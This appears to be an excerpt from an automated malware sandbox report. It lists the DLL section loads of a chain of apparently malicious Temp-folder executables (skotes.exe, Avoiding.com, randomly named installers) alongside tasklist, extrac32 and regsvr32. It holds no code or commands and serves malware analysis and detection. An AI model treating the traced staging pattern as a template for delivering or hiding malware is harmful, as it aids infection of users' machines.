Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
